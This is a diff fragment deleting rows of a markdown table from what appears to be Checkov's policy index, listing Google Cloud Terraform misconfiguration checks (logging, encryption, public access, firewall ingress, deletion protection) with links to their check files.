-| 1666 | CKV_GCP_61      | resource | google_container_cluster                                | Enable VPC Flow Logs and Intranode Visibility                                                                                                                                                            | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py)                                                                               |
-| 1667 | CKV_GCP_62      | resource | google_storage_bucket                                   | Bucket should log access                                                                                                                                                                                 | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py)                                                                                 |
-| 1668 | CKV_GCP_63      | resource | google_storage_bucket                                   | Bucket should not log to itself                                                                                                                                                                          | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py)                                                                         |
-| 1669 | CKV_GCP_64      | resource | google_container_cluster                                | Ensure clusters are created with Private Nodes                                                                                                                                                           | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py)                                                                                         |
-| 1670 | CKV_GCP_65      | resource | google_container_cluster                                | Manage Kubernetes RBAC users with Google Groups for GKE                                                                                                                                                  | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py)                                                             |
-| 1671 | CKV_GCP_66      | resource | google_container_cluster                                | Ensure use of Binary Authorization                                                                                                                                                                       | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py)                                                                           |
-| 1672 | CKV_GCP_68      | resource | google_container_cluster                                | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                             |
-| 1673 | CKV_GCP_68      | resource | google_container_node_pool                              | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                             |
-| 1674 | CKV_GCP_69      | resource | google_container_cluster                                | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                   |
-| 1675 | CKV_GCP_69      | resource | google_container_node_pool                              | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                   |
-| 1676 | CKV_GCP_70      | resource | google_container_cluster                                | Ensure the GKE Release Channel is set                                                                                                                                                                    | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py)                                                                                     |
-| 1677 | CKV_GCP_71      | resource | google_container_cluster                                | Ensure Shielded GKE Nodes are Enabled                                                                                                                                                                    | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py)                                                                           |
-| 1678 | CKV_GCP_72      | resource | google_container_cluster                                | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                               |
-| 1679 | CKV_GCP_72      | resource | google_container_node_pool                              | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                               |
-| 1680 | CKV_GCP_73      | resource | google_compute_security_policy                          | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                  | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py)                                                               |
-| 1681 | CKV_GCP_74      | resource | google_compute_subnetwork                               | Ensure that private_ip_google_access is enabled for Subnet                                                                                                                                               | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py)                                               |
-| 1682 | CKV_GCP_75      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted FTP access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py)                                   |
-| 1683 | CKV_GCP_76      | resource | google_compute_subnetwork                               | Ensure that Private google access is enabled for IPV6                                                                                                                                                    | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py)                                       |
-| 1684 | CKV_GCP_77      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow on ftp port                                                                                                                                        | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py)                                   |
-| 1685 | CKV_GCP_78      | resource | google_storage_bucket                                   | Ensure Cloud storage has versioning enabled                                                                                                                                                              | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py)                                                             |
-| 1686 | CKV_GCP_79      | resource | google_sql_database_instance                            | Ensure SQL database is using latest Major version                                                                                                                                                        | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py)                                                                               |
-| 1687 | CKV_GCP_80      | resource | google_bigquery_table                                   | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                      | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py)                                                             |
-| 1688 | CKV_GCP_81      | resource | google_bigquery_dataset                                 | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                    | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py)                                                         |
-| 1689 | CKV_GCP_82      | resource | google_kms_crypto_key                                   | Ensure KMS keys are protected from deletion                                                                                                                                                              | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py)                                                                         |
-| 1690 | CKV_GCP_83      | resource | google_pubsub_topic                                     | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                         | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py)                                                                 |
-| 1691 | CKV_GCP_84      | resource | google_artifact_registry_repository                     | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                        | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py)                                                       |
-| 1692 | CKV_GCP_85      | resource | google_bigtable_instance                                | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                   | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py)                                                       |
-| 1693 | CKV_GCP_86      | resource | google_cloudbuild_worker_pool                           | Ensure Cloud build workers are private                                                                                                                                                                   | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py)                                                                 |
-| 1694 | CKV_GCP_87      | resource | google_data_fusion_instance                             | Ensure Data fusion instances are private                                                                                                                                                                 | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py)                                                                     |
-| 1695 | CKV_GCP_88      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted mysql access                                                                                                                          | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py)                               |
-| 1696 | CKV_GCP_89      | resource | google_notebooks_instance                               | Ensure Vertex AI instances are private                                                                                                                                                                   | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py)                                                                         |
-| 1697 | CKV_GCP_90      | resource | google_dataflow_job                                     | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                        | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py)                                                                 |
-| 1698 | CKV_GCP_91      | resource | google_dataproc_cluster                                 | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py)                                                         |
-| 1699 | CKV_GCP_92      | resource | google_vertex_ai_dataset                                | Ensure Vertex AI datasets uses a CMK (Customer Managed Key)                                                                                                                                              | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py)                                                         |
-| 1700 | CKV_GCP_93      | resource | google_spanner_database                                 | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py)                                                         |
-| 1701 | CKV_GCP_94      | resource | google_dataflow_job                                     | Ensure Dataflow jobs are private                                                                                                                                                                         | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py)                                                                                   |
-| 1702 | CKV_GCP_95      | resource | google_redis_instance                                   | Ensure Memorystore for Redis has AUTH enabled                                                                                                                                                            | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py)                                                           |
-| 1703 | CKV_GCP_96      | resource | google_vertex_ai_metadata_store                         | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key)                                                                                                                                        | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py)                                             |
-| 1704 | CKV_GCP_97      | resource | google_redis_instance                                   | Ensure Memorystore for Redis uses intransit encryption                                                                                                                                                   | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py)                                           |
-| 1705 | CKV_GCP_98      | resource | google_dataproc_cluster_iam_binding                     | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                           |
-| 1706 | CKV_GCP_98      | resource | google_dataproc_cluster_iam_member                      | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                           |
-| 1707 | CKV_GCP_99      | resource | google_pubsub_topic_iam_binding                         | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                   |
-| 1708 | CKV_GCP_99      | resource | google_pubsub_topic_iam_member                          | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                   |
-| 1709 | CKV_GCP_100     | resource | google_bigquery_table_iam_binding                       | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                               |
-| 1710 | CKV_GCP_100     | resource | google_bigquery_table_iam_member                        | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                               |
-| 1711 | CKV_GCP_101     | resource | google_artifact_registry_repository_iam_binding         | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                 |
-| 1712 | CKV_GCP_101     | resource | google_artifact_registry_repository_iam_member          | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                 |
-| 1713 | CKV_GCP_102     | resource | google_cloud_run_service_iam_binding                    | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                     |
-| 1714 | CKV_GCP_102     | resource | google_cloud_run_service_iam_member                     | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                     |
-| 1715 | CKV_GCP_103     | resource | google_dataproc_cluster                                 | Ensure Dataproc Clusters do not have public IPs                                                                                                                                                          | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py)                                                                         |
-| 1716 | CKV_GCP_104     | resource | google_data_fusion_instance                             | Ensure Datafusion has stack driver logging enabled                                                                                                                                                       | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py)                                                                     |
-| 1717 | CKV_GCP_105     | resource | google_data_fusion_instance                             | Ensure Datafusion has stack driver monitoring enabled                                                                                                                                                    | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py)                                                         |
-| 1718 | CKV_GCP_106     | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access                                                                                                                   | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py)                                   |
-| 1719 | CKV_GCP_107     | resource | google_cloudfunctions2_function_iam_binding             | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 1720 | CKV_GCP_107     | resource | google_cloudfunctions2_function_iam_member              | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 1721 | CKV_GCP_107     | resource | google_cloudfunctions_function_iam_binding              | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 1722 | CKV_GCP_107     | resource | google_cloudfunctions_function_iam_member               | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 1723 | CKV_GCP_108     | resource | google_sql_database_instance                            | Ensure hostnames are logged for GCP PostgreSQL databases                                                                                                                                                 | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py)                                                       |
-| 1724 | CKV_GCP_109     | resource | google_sql_database_instance                            | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower                                                                                                                                  | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py)                                     |
-| 1725 | CKV_GCP_110     | resource | google_sql_database_instance                            | Ensure pgAudit is enabled for your GCP PostgreSQL database                                                                                                                                               | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py)                                                   |
-| 1726 | CKV_GCP_111     | resource | google_sql_database_instance                            | Ensure GCP PostgreSQL logs SQL statements                                                                                                                                                                | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py)                                                     |
-| 1727 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_binding                       | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 1728 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_member                        | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 1729 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_policy                        | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 1730 | CKV_GCP_113     | data     | google_iam_policy                                       | Ensure IAM policy should not define public access                                                                                                                                                        | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py)                                                                                 |
-| 1731 | CKV_GCP_114     | resource | google_storage_bucket                                   | Ensure public access prevention is enforced on Cloud Storage bucket                                                                                                                                      | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py)                                                 |
-| 1732 | CKV_GCP_115     | resource | google_organization_iam_binding                         | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                   |
-| 1733 | CKV_GCP_115     | resource | google_organization_iam_member                          | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                   |
-| 1734 | CKV_GCP_116     | resource | google_folder_iam_binding                               | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                             |
-| 1735 | CKV_GCP_116     | resource | google_folder_iam_member                                | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                             |
-| 1736 | CKV_GCP_117     | resource | google_project_iam_binding                              | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                           |
-| 1737 | CKV_GCP_117     | resource | google_project_iam_member                               | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                           |
-| 1738 | CKV_GCP_118     | resource | google_iam_workload_identity_pool_provider              | Ensure IAM workload identity pool provider is restricted                                                                                                                                                 | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py)                                               |
-| 1739 | CKV_GCP_119     | resource | google_spanner_database                                 | Ensure Spanner Database has deletion protection enabled                                                                                                                                                  | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py)                                                     |
-| 1740 | CKV_GCP_120     | resource | google_spanner_database                                 | Ensure Spanner Database has drop protection enabled                                                                                                                                                      | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py)                                                             |
-| 1741 | CKV_GCP_121     | resource | google_bigquery_table                                   | Ensure BigQuery tables have deletion protection enabled                                                                                                                                                  | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py)                                                         |
-| 1742 | CKV_GCP_122     | resource | google_bigtable_instance                                | Ensure Big Table Instances have deletion protection enabled                                                                                                                                              | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py)                                                   |
-| 1743 | CKV_GCP_123     | resource | google_container_cluster                                | GKE Don't Use NodePools in the Cluster configuration                                                                                                                                                     | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py)                                                                                 |
-| 1744 | CKV2_GCP_1      | resource | google_project_default_service_accounts                 | Ensure GKE clusters are not running using the Compute Engine default service account                                                                                                                     | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml)                         |
-| 1745 | CKV2_GCP_2      | resource | google_compute_network                                  | Ensure legacy networks do not exist for a project                                                                                                                                                        | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml)                                                     |
-| 1746 | CKV2_GCP_3      | resource | google_service_account_key                              | Ensure that there are only GCP-managed service account keys for each service account                                                                                                                     | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml)                                                   |
-| 1747 | CKV2_GCP_4      | resource | google_logging_folder_sink                              | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 1748 | CKV2_GCP_4      | resource | google_logging_organization_sink                        | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 1749 | CKV2_GCP_4      | resource | google_logging_project_sink                             | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 1750 | CKV2_GCP_4      | resource | google_storage_bucket                                   | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 1751 | CKV2_GCP_5      | resource | google_project                                          | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                       |
-| 1752 | CKV2_GCP_5      | resource | google_project_iam_audit_config                         | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                       |
-| 1753 | CKV2_GCP_6      | resource | google_kms_crypto_key                                   | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 1754 | CKV2_GCP_6      | resource | google_kms_crypto_key_iam_binding                       | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 1755 | CKV2_GCP_6      | resource | google_kms_crypto_key_iam_member                        | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                               |
-| 1756 | CKV2_GCP_7      | resource | google_sql_database_instance                            | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
-| 1757 | CKV2_GCP_7      | resource | google_sql_user                                         | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
